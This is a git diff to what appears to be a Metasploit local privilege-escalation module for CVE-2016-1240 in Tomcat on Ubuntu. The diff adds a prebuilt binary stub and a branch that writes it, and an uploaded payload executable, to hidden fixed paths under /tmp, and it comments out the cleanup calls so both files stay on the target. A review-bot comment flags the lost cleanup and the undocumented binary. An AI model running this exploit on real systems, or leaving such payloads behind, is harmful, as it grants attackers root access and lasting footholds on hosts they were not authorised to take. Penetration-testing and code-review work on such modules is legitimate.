diff --git a/data/exploits/CVE-2016-1240/stub.so b/data/exploits/CVE-2016-1240/stub.so
new file mode 100644
index 0000000000..48bacc039a
Binary files /dev/null and b/data/exploits/CVE-2016-1240/stub.so differ
diff --git a/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb b/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb
index 71e7374713..5770d5d40d 100644
--- a/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb
+++ b/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb
@@ -133,18 +133,28 @@ class MetasploitModule < Msf::Exploit::Local
 )
 print_good("Original #{catalina} backed up to #{path}")
+ if live_compile?
+ # upload our privesc stub
+ so_stub = ".#{rand_text_alphanumeric(5..10)}.so"
+ so_stub_path = "#{base_dir}/#{so_stub}"
+ payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+
+ # Upload exploit stub
+ vprint_status "Compiling exploit stub: #{so_stub_path}"
+ upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl'
+ else
+ payload_path = '/tmp/.jMeY5vToQl'
+ so_stub = '.ny9NyKEPJ.so'
+ so_stub_path = "/tmp/#{so_stub}"
+
+ write_file(so_stub_path, exploit_data('CVE-2016-1240', 'stub.so'))
+ end
 # Upload payload executable
- payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
 vprint_status("Uploading Payload to #{payload_path}")
 upload_and_chmodx payload_path, generate_payload_exe
- register_file_for_cleanup(payload_path)
+ # register_file_for_cleanup(payload_path)
- # upload our privesc stub
- so_stub = ".#{rand_text_alphanumeric(5..10)}.so"
- so_stub_path = "#{base_dir}/#{so_stub}"
- vprint_status "Compiling exploit stub: #{so_stub_path}"
- upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl'
- register_file_for_cleanup(so_stub_path)
+ # register_file_for_cleanup(so_stub_path)
 # delete the log and symlink ld.so.preload
 vprint_status("Deleting #{catalina}")
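Review bot: Both `register_file_for_cleanup` calls are commented out rather than kept, so after this change neither the uploaded payload nor the preload stub is removed from the assessed host, and in the `else` branch they remain at fixed names under `/tmp`. Both variables are set on either path of the `if`/`else`, so the two lines can be restored as they were: `register_file_for_cleanup(payload_path)` and `register_file_for_cleanup(so_stub_path)`. The `else` branch also bypasses `base_dir` and hard-codes `/tmp/.jMeY5vToQl`; presumably that path is baked into the prebuilt `stub.so`, which is added as a binary with no record of how it was built, so a comment such as `# stub.so is prebuilt from privesc_preload.c with $BACKDOORPATH fixed to payload_path below; keep both in sync` would make the coupling explicit. The enclosing method starts and ends outside the hunk.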